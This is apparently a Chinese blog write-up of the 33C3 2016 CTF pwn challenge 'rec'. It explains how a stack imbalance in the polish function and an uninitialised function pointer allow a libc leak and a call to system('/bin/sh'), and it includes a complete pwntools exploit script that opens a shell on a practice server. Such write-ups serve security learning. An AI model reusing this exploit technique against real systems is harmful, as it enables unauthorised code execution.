rec_33c3_2016(堆栈不平衡导致漏洞利用)

最新推荐文章于 2024-06-12 14:39:46 发布
最新推荐文章于 2024-06-12 14:39:46 发布
阅读量600 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106676141
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,功能1可以用于栈数据泄露,轻松得到glibc地址

功能5有一个函数指针,当输入为0时,其值未初始化

因此,只要能控制其指针在栈里对应的数据,就可以执行任意代码。但是sign函数的栈太低,不能依靠其他函数直接来控制,这里在IDA的伪代码里看不出来,就直接看汇编。

在polish函数中,此处存在栈不平衡的问题

在call之前,开辟了0x10的空间,而call回来后仅仅add esp,8,栈降低了8字节。这点在伪代码里是看不出来的。

也就是在S求和的过程中,每循环一次,esp就会降低8字节

然后通过push就可以往栈里写数据

由此,我们就可以在sign函数对应的位置布置下函数指针的值

#coding:utf8
from pwn import *
from LibcSearcher import *

#sh = process('./rec_33c3_2016',env={'LD_PRELOAD':'./libc-2.23_1.so'})
sh = remote('node3.buuoj.cn',25620)
libc = ELF('./libc-2.23_1.so')

def show():
   sh.sendlineafter('>','1')
   sh.recvuntil('Your note: ')

def do_sum(data):
   sh.sendlineafter('>','2')
   sh.sendlineafter('Operator:','S')
   for x in data:
      sh.sendlineafter('Operand:',str(x))
   sh.sendlineafter('Operand:','.')


def getShell():
   sh.sendlineafter('>','5')
   sh.sendline('0')

show()
sh.recv(8)
_IO_2_1_stdout_addr = u32(sh.recv(4))
libc_base = _IO_2_1_stdout_addr - libc.sym['_IO_2_1_stdout_']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)
data = []
for i in range(0x63):
   data.append(i)
data.append(system_addr - 0x100000000)
data.append(binsh_addr - 0x100000000)
#利用push将数据写入栈里
do_sum(data)
#getshell
getShell()

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
]@NR_S%%P}33C@9SFA58)VU.png
05-19
]@NR_S%%P}33C@9SFA58)VU.png
UC10_入库用例描述1
08-08
**33c:位置不存在** - 若输入的存储位置在仓库布局中找不到,系统会提示该位置不存在,需要检查并重新输入正确的位置信息。 **33d:取消输入** - 仓库管理人员可以选择取消输入,系统会提示已取消并结束当前的入库...
IDA F5堆栈平衡的处理
lilac的博客
12-29 5523
IDA F5堆栈平衡的处理 1.引出问题 F5时出现如图错误,一般是程序代码有一些干扰代码,让IDA的反汇编分析出现错误。比如用push + n条指令 + retn来实际跳转,而IDA会以为retn是函数要结束,结果它分析后发现调用栈不平衡,因此就提示sp analysis failed. 我们选择抖音老版本的libcms.so作为分析案例,假设Java代码如下 static { Sy...
33c3-pwn500-recurse
weixin_30555515的博客
04-01 111
Recurse 好记性不如烂笔头。当时没有记录,现在趁着有时间简单写一写,为以后留备份。 这个题目当时并没有队伍做出来,赛后作者发布了题目的源码和解答。看了之后发现是一个UAF漏洞,不过漏洞很不好找。直接用IDA的F5看代码会感觉怪怪的,这是因为程序的编译用到了safestack,safestack是llvm中一种防止内存破坏漏洞的措施,该机制将栈分为了safestack和un...
远程代码执行(RCE)攻击:原理、案例分析与防御策略
最新发布
m0_61532714的博客
06-12 1043
通过深入理解RCE的攻击原理及其潜在影响,开发者和可靠从业者可以采取有效的防御措施来保护Web应用程序的可靠。多层次的综合防御策略,包括输入验证、限制命令执行、使用可靠的库和函数以及严格的访问控制,是防范RCE攻击的关键。为了有效防范RCE攻击,需要采用多层次的防御策略,包括输入验证、限制命令执行、使用可靠的库和函数以及严格的访问控制。不可靠的反序列化是指攻击者通过构造恶意的序列化数据,使应用程序在反序列化时执行恶意代码。代码注入是指攻击者通过构造恶意输入,使应用程序执行注入的代码,从而控制目标服务器。
汇编语言里调用函数的过程和堆栈平衡问题
qq_35289660的博客
02-22 750
汇编语言里调用函数的过程和堆栈平衡问题 文章目录汇编语言里调用函数的过程和堆栈平衡问题@[toc]1、汇编实例:简单函数调用时堆栈的变化过程1.调用函数前:传入参数2.调用函数时1.开辟空间(缓存区)2.保存现场3.覆盖缓存区4.执行函数的功能5.恢复现场6.恢复空间7.函数结尾:RENT3.总结2、堆栈平衡3、IDA堆栈平衡问题:positive sp value has been found...
babyfengshui_33c3_2016题解
coco的博客
12-09 903
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
PWN入门之栈迁移
weixin_44681716的博客
04-24 2901
实验目的 在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell?使用栈迁移的方法便能解决这个问题。在这里用lab4的文件来举例。 实验文件 链接:https://pan.baidu.com/s/1CW0eZM-yFNZfOfqlLnxqCw 提取码:tmo3 实验步骤 首先来介绍一下栈迁移是什么? 以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进...
wd33c93.rar_Linux/Unix编程_Unix_Linux_
08-11
标题“wd33c93.rar_Linux/Unix编程_Unix_Linux_”暗示了这是一个与Linux或Unix系统相关的编程资源,可能是一个源代码库或者一个驱动程序的实现,其中“wd33c93”可能是设备驱动的名字,可能是针对某种特定硬件的,如...
Android代码-33C3 FahrPlan Schedule
08-06
This was a fork from tuxmobils FahrPlan application for 33C3 purposes. This fork is not active anymore - please head over to confi for the next iteration
robomongo-0.9.0-rc10-windows-x86_64
10-31
总的来说,RoboMongo是MongoDB开发和管理中不可或缺的工具,它提供了直观、高效的方式来操作MongoDB,简化了数据库管理工作,提升了开发者的生产力。通过下载并安装"robomongo-0.9.0-rc10-windows-x86_64-33c89ea....
CTF逆向基础----花指令总结
一位非著名不专业的Re选手
03-13 9549
什么是花指令? 花指令实质就是一串垃圾指令,它与程序本身的功能无关,并不影响程序本身的逻辑。在软件保护中,花指令被作为一种手段来增加静态分析的难度,花指令也可以被用在病毒或木马上,通过加入花指令改变程序的特征码,躲避杀软的扫描,从而达到免杀的目的,本文将介绍一些常见的花指令的形式,花指令一般被分为两类,被执行的和不会被执行的。 不会被执行的花指令 花指令虽然被插入到了正常代码的中间,但是并不意味着它一定会得到执行,这类花指令通常形式为在代码中出现了类似数据的代码,或者IDA反汇编后为jmupout(xxxx
REC代码及命令执行代码全解
qq_45750691的博客
08-17 1534
第30天—REC代码及命令执行代码全解 ​ 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 代码执行 代码执行的危害 执行脚本代码 脚本能干嘛 它就能干嘛 案例(PHP环境) 假设对方存在这样的一个代码执行漏洞 就可以用代码去攻击它 通过evel去上传一个webshell,然后去控制它 <?
RCE
zylm0的博客
03-09 587
1:rec定义:远程连接命令/代码执行漏洞,简称RCE漏洞,能够让攻击者直接向后台服务器远程写入服务器系统命令或者代码,从而控制后台系统。RCE分为远程连接命令执行ping和远程代码执行evel 2:REC攻击方式 服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。 3:RCE防御方法 在进入运行命令变量前做好严格的网站安全检...
re -25 buuctf [网鼎杯 2020 青龙组]jocker
weixin_45847059的博客
12-02 335
[网鼎杯 2020 青龙组]jocker 前话:ida7.6设置栏内没有general,可以通过ctrl+shift+p打开命令面板,搜索option打开设置选项,于Disassembly设置堆栈显示 正文: ida打开后发现堆栈平衡,先把堆栈平衡 将call函数那行alt+k后改为0 堆栈平衡后,发现主函数引用了wrong,omg,encrypt,finally四个函数。 奇数位向减,偶数位异或 检验由wrong函数处理后数据是否与unk_4030C0相等。据此可以先推测下Str是什么。 #
REC——命令执行漏洞
2301_76160896的博客
12-04 795
命令注入漏洞详解
堆栈平衡:估计这是最详细的讲解堆栈平衡的了 vc++6.0
lixiangminghate的专栏
01-27 9399
#include #include #include #include int ShowEsp(int* arg1,int* arg2); /* 引言 各种面试宝典上都会说 又说栈在进程空间的高地址部分,向下扩展; 堆在进程空间的低地址部分,堆向上扩展 来验证一下是否正如所说这些变量在内存中如何分布? */ int main() { //0) int i=0xABCDABCD;
【C#】调用导致堆栈不对称。
少莫千华
04-16 2131
问题描述 托管调试助手“PInvokeStackImbalance”在“...\bin\Release\xxx.vshost.exe”中检测到问题。 其他信息: 对 PInvoke 函数“RSS_ATDPS_Control!System.C::SetWindowLong”的调用导致堆栈不对称。原因可能是托管的 PInvoke 签名与非托管的目标签名不匹配。请检查 PInvoke 签名的调用...
R8C33C单片机详尽应用指南:硬件功能与电特性详解
本篇文档是R8C33C单片机的详尽使用手册,专为设计和开发基于这款芯片的应用系统用户提供指导。R8C33C是由日本NEC电子公司与株式会社瑞萨科技合并后,由瑞萨电子公司生产的微控制器。手册旨在确保用户在具备基本电路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值